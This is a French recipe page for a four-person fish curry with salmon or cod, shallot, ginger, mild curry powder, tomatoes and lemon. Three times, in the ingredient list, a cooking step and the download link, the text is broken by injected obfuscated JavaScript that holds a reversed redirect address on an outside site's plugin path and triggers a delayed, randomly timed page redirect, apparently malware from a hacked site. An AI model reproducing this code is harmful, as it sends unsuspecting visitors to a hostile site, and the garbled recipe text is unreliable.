CURRY DE POISSON

CURRY DE POISSON

Pour 4 Pers.

INGRÉDIENTS :

– 4 filets de poisson au choix (saumon et cabillaud par exemple)
– 1 échalote ciselée
– 1 gousse d’ail émincée
– Gingembre frais émincé 1 CC
– Curry doux en poudre 1 CS
– 1 boîte de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées (400g)
– le jus d’1/2 citron
– 1 CS d’huile d’olive
– fleur de sel et poivre du moulin

Faire revenir dans une cocotte l’échalote, le gingembre et l’ail avec l’huile d’olive.


Ajouter le curry, les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates et le jus de citron. Bien mélanger.


Déposer les filets de poisson, couvrir et cuire à feu moyen 10 minutes.


Rectifier l’assaisonnement, c’est prêt !


Les conseils de Joanne : Servez ce curry de poisson sur un lit de salade. Le reste de la famille peut le déguster avec du riz Basmati.


Bon appétit !

RECETTES-BE-HARMONY_curry-de-poisson-2toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.